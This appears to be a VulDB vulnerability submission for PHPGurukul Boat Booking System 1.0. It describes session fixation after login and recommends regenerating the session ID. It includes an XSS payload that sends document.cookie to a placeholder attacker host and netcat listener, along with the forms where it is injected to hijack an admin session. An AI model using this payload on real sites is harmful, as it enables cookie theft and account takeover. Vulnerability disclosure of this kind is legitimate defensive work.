[go: up one dir, main page]
More Web Proxy on the site http://driver.im/

Submit #425414: PHPGurukul Boat Booking System 1.0 Session Fixiationinfo

TitlePHPGurukul Boat Booking System 1.0 Session Fixiation
DescriptionThe session is being started (session_start()) without regenerating the session ID after login, which could expose the system to session fixation attacks. An attacker can force a session ID onto a victim and then hijack it after the victim logs in. Risk: If an attacker gets hold of the session ID (via XSS or other means), they could hijack the session and impersonate the user. Fix: After logging in, regenerate the session ID to prevent this attack. Via injecting <script>var i=new Image(); i.src="http://x.x.x.x:1234/?cookie="+btoa(document.cookie);</script> payload to forms in book-boat.php, attacker can inject a XSS payload. When admin user sign in to check on all-booking.php, payload will be triggered and admin cookie is forwarded to attacker's netcat listener, which can be used to login as the admin user without needing any credentials.
Source⚠️ https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_session_fixation.md
User
 jadu101 (UID 70632)
Submission17.10.2024 06:12 (vor 5 Monaten)
Moderation18.10.2024 21:17 (2 days later)
StatusAkzeptiert
VulDB Entry280944 [PHPGurukul Boat Booking System 1.0 session_start schwache Authentisierung]
Points20

Do you want to use VulDB in your project?

Use the official API to access entries easily!